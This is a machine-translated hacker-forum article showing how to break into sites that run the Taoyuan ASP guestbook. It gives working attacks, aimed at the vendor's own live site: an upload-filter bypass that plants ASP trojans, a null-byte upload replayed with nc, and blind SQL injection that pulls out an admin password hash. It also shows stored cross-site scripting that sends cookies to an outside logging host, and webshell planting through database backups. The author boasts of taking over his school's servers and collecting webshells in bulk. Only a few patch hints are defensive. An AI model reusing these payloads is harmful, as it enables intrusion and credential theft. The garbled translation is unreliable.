Taoyuan message is a Taoyuan studio http://www.mytaoyuan.com/development of an ASP message system. Because Taoyuan message this interface fresh, powerful, concise application, so by some large and small web site adopted by many webmaster's praise. Taoyuan message from the original version 2.0, upgraded to the current version 3.0. Its official website is also version 3.0. Some time ago, when I invaded the website of our school, I found this message on the website of a department. So I have a study of it, I downloaded the source code for each version, read some of the code, found that a lot of holes.
I. Uploading a vulnerability
When I was searching on the internet, I found someone had posted an upload vulnerability. But the online release is for the 2.0 edition, not comprehensive. Taoyuan message This upload vulnerability in fact all versions exist. All versions have 3 places to upload: upfile_article.asp,upfile_dialog.asp,upfile_photo.asp. Here the upload vulnerability and power 3.51 of the upload vulnerability is basically the same. Moving the network has brought the upload loophole has passed, I believe that we have been quite familiar with the upload vulnerability. But I still want to mention it here. Take a look at Taoyuan message This latest version of the upfile_article.asp section of Code 3.0.
For every formName in Upload.file ' lists all uploaded files, a For loop!
Set Ofile=upload.file (formName) ' generates a File object
...
Arrupfiletype=split (Upfiletype, "|") ' Get a defined suffix name that can be uploaded
For i=0 to UBound (Arrupfiletype)
If Fileext=trim (Arrupfiletype (i)) then
Enableupload=true hoho,enableupload ' variable changed!
Exit For
End If
Next
If fileext= "ASP" or fileext= "ASA" or fileext= "aspx" or fileext= "CER" or "fileext=" CDX "then" ha, are filtered.
Enableupload=false
End If
If Enableupload=false Then
msg= "This file type is not allowed to upload! \ n \ nyou only allow uploading of these types of files: "& Upfiletype
Founderr=true hoho,founderr ' variable changed!
End If
...
If Founderr<>true then ' is another important place, the FOUNDERR variable is the key to whether or not to upload
Randomize
Rannum=int (900*rnd) +100 ' generates a random number
Filename=savepath&year (now) &month-&day (now) &hour (now) &minute (now) &second (now) & rannum& "." &fileext ' does not change the suffix of the uploaded file
...
Here is transformation no component upload, the specific principle of vulnerability analysis, I do not want to say more, because there are too many people analysis. Because transformation upload can upload multiple files at the same time, the author does not consider this situation. When we upload two files, we assume that the first one is 1.gif and the second one is 2.php. Because the 1.gif matches the suffix name that can be uploaded, the variable enableupload=true. When the second file 2.php upload, the value of the variable has not changed, and PHP is not asp,aspx,cer,cdx These special circumstances, and cheated the detection, founderr<>true, so 2.php will also be uploaded to the server with 1.gif. 1.gif was uploaded to cover 2.php, and the second file could be any suffix other than asp,aspx,cer,cdx. If the server supports JSP, we can also pass the JSP Trojan. In fact, this 3.0 version of the upfile_article.asp is still on the upload bug patch, but repair enough, we still have a way to break through. Because in the previous version 2.0, 2.1 version of the above sentence is: if fileext= "ASP" or fileext= "ASA" or fileext= "aspx" then, so that we can easily pass the CER,CDX suffix of the ASP trojan. 3.0 version of the really strange, upfile_article.asp and upfile_photo.asp are patched up, that is, to increase the CER,CDX suffix filter, but upfile_dialog.asp and 2.0 version 2.1 version of the same. Therefore, we can use the upfile_dialog.asp directly in the 3.0 edition to modify the key parts of upload_dialog.asp:
<body bgcolor=menu leftmargin= "5" topmargin= "0" >
<form action= "http://www.mytaoyuan.com/ly/Upfile_Dialog.asp" method= "Post" Name= "Form1" onsubmit= "return Check () "Enctype=" Multipart/form-data ">
<input name= "FileName" type= "FILE" class= "tx1" size= ">"
<input name= "FileName1" type= "FILE" class= "tx1" size= ">"
<input type= "Submit" name= "submit" value= "Upload" >
<input name= "DialogType" type= "hidden" id= "DialogType" value= "pic" >
</form>
</body>
See Figure 1 for the following dialogtype this hidden variable. HOHO, the first file selected GIF file, the second ASP Trojan to change the suffix to CDX, passed up on the OK. As shown in Figure 2.
The 3.0 version of upfile_article.asp is not a good way to fix this vulnerability. , in fact, since the release of the power leak, many systems are similar to the loophole, many webmaster is so patched upload loopholes, but they do not understand the true principle. We construct the ASP. gif suffix, also transform the upload_article.asp, upload 2 files, the first 1.gif, the 2nd 2.asp. gif, Then upload grab bag save for Bao.txt, with Winhex open bao.txt, the space corresponding to 20 棏 to 00 (I believe we are skilled). And then with NC submission, NC www.mytaoyuan.com 80<bao.txt, so that the ASP Trojan Horse passed up. As pictured. Better patching can be found in upfile_dialog.asp
If Founderr<>true Then
Randomize
Rannum=int (900*RND) +100
Filename=savepath&year (now) &month-&day (now) &hour (now) &minute (now) &second (now) & rannum& "." &fileext
Ofile. SaveToFile Server.MapPath (FileName) ' Save file '
In Filename=savepath & Ofile. FileName add: Filename=replace (FILENAME,CHR (0), "") can, it filtered 00.
Two. Injection holes
Open the message book, found that the bottom of the message has a search box. Figure 3, and look at its default.asp inside code.
Select Case Option1
Case 1
Sql= "Select * from guest where" &mark& "subject like '%" &text& "% '" &jinghua& "ORDER by TOP1, Lastdate DESC "
Case 2
Sql= "Select * from guest where" &mark& "content like '%" &text& "% '" &jinghua& "ORDER by TOP1, Lastdate DESC "
Case 3
There is no filtering for the text variable before and after. If we fill in the search term in the box: Suggest ' and 1=1 and '% ' = '
The query statement becomes: ' Subject like '% suggests ' and 1=1 ' and '% ' = '% ' and webid= ' ORDER by top1,lastdate Desc ', with single quotes, and returns the recommended content normally. I am on the Taoyuan message this official website test is as follows:
Suggest ' and 1= (select @ @version) and '% ' =//See if SQL database
Recommended ' and 0<> (select COUNT (*) from register) and '% ' =//See if the Administrator table exists, I'm afraid the administrator changed the default table name
Recommended ' and 0<> (select ID from register where username= ' admin ') and '% ' =//See admin is not admin
Recommended ' and (select username from register where username= ' rain or shine ') and '% ' = '//OK admin is rain or shine, this is from the message this is to see
Recommended ' and 0<> (select ID from register where id=1) and '% ' = '//Determine if the administrator ID is 1
Recommended ' and exists (select ID from register where len (password1) =16 and id=1) and '% ' = '//Determine if the Administrator password is also MD5 encrypted
Recommended ' and (select top 1 IDs from register where id=1 and ASC (Mid password1,1,1) <100) and '% ' = '//guess password length, already known to be 16-bit MD5
Recommended ' and (select top 1 ID from register where id=1 and ASC (Mid password1,1,1) =51) and '% ' = '
Recommended ' and (select top 1 ID from register where id=1 and ASC (Mid password1,2,1) <100) and '% ' = '
...
The 16-digit MD5 password every one guessed out, the control of the ASC Code table to determine the password is ciphertext: 350e2cfa35948c49, you can test, submit:
Recommended ' and (select Password1 from register where password1= ' 350e2cfa35948c49 ') and '% ' = '
Taoyuan message of all basically did not filter, and then look at the show.asp, used to show the message.
Dsql= "Delete from reply where id1=" &request ("id")
Conn.execute (Dsql)
Rs.Open "Select * from guest where ID =" & Request ("ID1"), conn,2,3
ID This variable any filter, so we click on any one of the messages, is the injection point.
Three. Cookies loophole
Read the Login.asp and found the following code:
Response.Cookies ("ly"). Path=cookiepath
Response.Cookies ("ly") ("Useridname") =name
Response.Cookies ("ly") ("Useridpassword") =pass
If RS ("level1") = "admin" then Response.Cookies ("ly") ("admin") =1 else if RS ("level1") = "moderator" then Response.Cookies ("ly") (" Admin ") =2 else Response.Cookies (" ly ") (" admin ") =0
I immediately happy, cookies in the admin this variable we can make their own, so that they are not administrators? The best way to modify cookies is to change cookies with the Guilin veterans
Browser, more convenient. But it didn't work out. In Default.asp, there are:
If session ("Useridname") <> "then"
Rs.Open "Select Level1 from register where username= '" &session ("Useridname") & "", conn,1,1
If not rs.eof then
If RS ("level1") = "Administrator" then session ("admin") =1
If RS ("level1") = "Moderator" then session ("admin") =2
If RS ("Level1") <> "moderator" and RS ("Level1") <> "Admin" then session ("admin") =0
Else
Session ("admin") =0
End If
This is the addition of Session certification. This message has no background, as long as the administrator can be the front desk for management operations. This is true of every page that has a management function:
<%if session ("admin") <>1 then Response. Redirect "Default.asp"%>
and the password in the cookie is in clear text display, for example: USERIDPASSWORD=CCC&ADMIN=1&USERIDNAME=CCC. So the password we injected above can not be fooled by cookies unless it is cracked. But there is also a security factor. Cookies in the password is clear, so confidentiality is not good, if people peek, and our password and what mailbox, QQ password, it is miserable.
Four. Cross-station attack
This problem is more serious than the above. The flaw is mainly in the guest_register.asp. Here is the registration definition avatar Place, the definition avatar may choose the system to carry the avatar, also may upload oneself. Fill in a box with your own definition of the Avatar address.
<input name= "Myface" type= "text" class= "input1" id= "QQ3" size= ">"
<br>
</font></div></td>
<TD width= "458" align= "center" ><div align= "left" ><iframe style= "top:2px" id= "uploadfiles" src= "Upload" _photo.asp? Photourlid=0 "frameborder=0 scrolling=no width=" "height=" ></iframe>
<br>
Then in the guest_info.asp, here is the place to modify your registration information.
<TD width= "11%" > "Width=" Id=idface ></td>.
Myface This variable is not filtered. We construct the head Picture: Yun_qi_img/11.gif "><script>alert (' aaa") </script>, the final display is:
<script>alert (' aaa ah ') </script> "width=" height= ">"
<input name= "Myface" type= "text" class= "input1" id= "QQ3" value= "Yun_qi_img/11.gif" >alert (' aaa ah ') </script > "Size=" >
Naturally, the dialog box pops up two times. As shown in Figure 4. After testing the personal homepage There can also be a cross station attack. We will fill in the personal homepage:
Http://<script>alert (' aaa ah ') </script>, the final display is:
<a href= "Http://<script>alert (' aaa") </script> "target=" _blank ">http://<script>alert" (' AAA AH ') </script></a></font></div></td>
Our code has been executed again. Fill in some QQ number there is also a filter, but the length is limited, can not cross the station.
So we construct the Cross station, as long as the administrator read our post or information, he will recruit. Not in front of the cookies in the password plaintext display it? We'll steal cookies across the station. We construct the avatar Yun_qi_img/11.gif "><script>window.open" (' http://webshell.com/qq156544632/co.asp?msg= ' + Document.cookie) </script>
Personal homepage http://<script>window.open (' http://webshell.com/qq156544632/co.asp?msg= ' +document.cookie) </script > on the line. The co.asp below our http://webshell.com/qq156544632/should be like this:
<%
Msg=request.servervariables ("Query_string")
Testfile=server.mappath ("Qq156544632.txt")
Set Fs=server. CreateObject ("Scripting.FileSystemObject")
Set THISFILE=FS. OpenTextFile (testfile,8,true,0)
Thisfile. WriteLine ("&msg&")
Thisfile.close
Set fs = Nothing
%>
<script language=vbscript>window.close () </script>
(This code seems to be the original LCX eldest brother, thank you here.) So the administrator's cookies will be written into the http://webshell.com/qq156544632/156544632.txt.
By the way, the above cross-station code with the FSO object, so your http://webshell.com/must support Fso,window.close () here is to close the http://webshell.com/qq156544632/co.asp, lest arouse suspicion. Look at the cookies I stole. As shown in Figure 5.
Five. Other vulnerabilities
Taoyuan Message The default database is an MDB file, there is no download-proof measures. In the "hacker" more and more today, writing code is still so a bit inappropriate. Background has backup, restore the function of the database. Suppose we got the management password, can carry on the management operation, if the database has been changed to the ASP, we will casually place the word ASP Trojan horse to write into his database, turns his database into the ASP Trojan Horse. If the database is not changed, or we do not know the database path, we will first write a word trojan in the database, and then back up the database. Because the backup database defaults to ASA file, assuming we back up as Databackup/langzi.asa, we directly access Http://www.xxx.com/Databackup/langzi.asa, Is it also possible to use a word ASP Trojan operation?
Do you think it's a lot of holes after reading? Message this general again in the Web site supporting role, a lot of webmaster to the message of the script security enough attention, and message this developer
Also not enough security effort. In fact, any small vulnerability could be a threat to the security of the server. Sink, Shan. Take me, it is through this message this loophole, invaded our school a department of the website, and then invaded the school's website, and then further control the school website server, finally I infiltrated the intranet, control of all the school's servers. I hope that future scripting people must know the safety first, but also hope that other similar messages do not appear in this article the vulnerability mentioned. Baidu Search "Fill in the message user login to register to see the essence of the list" or other keywords can find a large number of use of Taoyuan message site, more than 90% have loopholes, I instantly got a batch of Webshell. Taoyuan message This official website loophole has not yet been mended, message this system has been for people to download, I hope we do not go up to bundle horses, and do not attack other domestic websites.
Due to my limited level, but also in a limited time to read the code roughly, error omission is unavoidable. Welcome to communicate with me, I qq:156544632, of course, it is best to our "Hacker X Files" forum to discuss.
